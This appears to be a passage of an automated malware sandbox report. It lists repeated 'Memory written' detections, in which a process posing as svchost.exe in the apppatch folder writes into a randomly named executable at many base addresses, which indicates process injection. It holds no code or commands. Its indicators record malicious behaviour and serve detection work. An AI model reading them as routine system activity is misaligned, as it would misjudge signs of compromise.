    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exe base: 2981000Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exe base: 2982000Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exe base: 29D5000Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exe base: 2320000Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exe base: 2321000Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exe base: 2322000Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exe base: 2375000Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exe base: 29C0000Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exe base: 29C1000Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exe base: 29C2000Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exe base: 2A15000Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exe base: 2990000Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exe base: 2991000Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exe base: 2992000Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exe base: 29E5000Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exe base: 2870000Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exe base: 2871000Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exe base: 2872000Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exe base: 28C5000Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exe base: 2580000Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exe base: 2581000Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exe base: 2582000Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exe base: 25D5000Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exe base: 2800000Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exe base: 2801000Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exe base: 2802000Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exe base: 2855000Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exe base: C00000Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exe base: C01000Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exe base: C02000Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exe base: C55000Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exe base: 2D30000Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exe base: 2D31000Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exe base: 2D32000Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exe base: 2D85000Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exe base: 820000Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exe base: 821000Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exe base: 822000Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exe base: 875000Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exe base: 31B0000Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exe base: 31B1000Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exe base: 31B2000Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exe base: 3205000Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exe base: 2870000Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exe base: 2871000Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exe base: 2872000Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exe base: 28C5000Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exe base: 2CF0000Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exe base: 2CF1000Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exe base: 2CF2000Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exe base: 2D45000Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exe base: 2AC0000Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exe base: 2AC1000Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exe base: 2AC2000Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exe base: 2B15000Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exe base: 2600000Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exe base: 2601000Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exe base: 2602000Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exe base: 2655000Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exe base: 2920000Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exe base: 2921000Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exe base: 2922000Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exe base: 2975000Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exe base: 2E90000Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exe base: 2E91000Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exe base: 2E92000Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exe base: 2EE5000Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exe base: 2270000Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exe base: 2271000Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exe base: 2272000Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exe base: 22C5000Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exe base: 1470000Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exe base: 1471000Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exe base: 1472000Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exe base: 14C5000Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exe base: 2270000Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exe base: 2271000Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exe base: 2272000Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exe base: 22C5000Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exe base: 2700000Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exe base: 2701000Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exe base: 2702000Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exe base: 2755000Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exe base: 2E80000Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exe base: 2E81000Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exe base: 2E82000Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exe base: 2ED5000Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exe base: 24E0000Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exe base: 24E1000Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exe base: 24E2000Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exe base: 2535000Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exe base: 2DB0000Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exe base: 2DB1000Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exe base: 2DB2000Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exe base: 2E05000Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exe base: 2880000Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exe base: 2881000Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exe base: 2882000Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exe base: 28D5000Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exe base: 28D0000Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exe base: 28D1000Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exe base: 28D2000Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exe base: 2925000Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exe base: 2EF0000Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exe base: 2EF1000Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exe base: 2EF2000Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exe base: 2F45000Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exe base: 1570000Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exe base: 1571000Jump to behavior
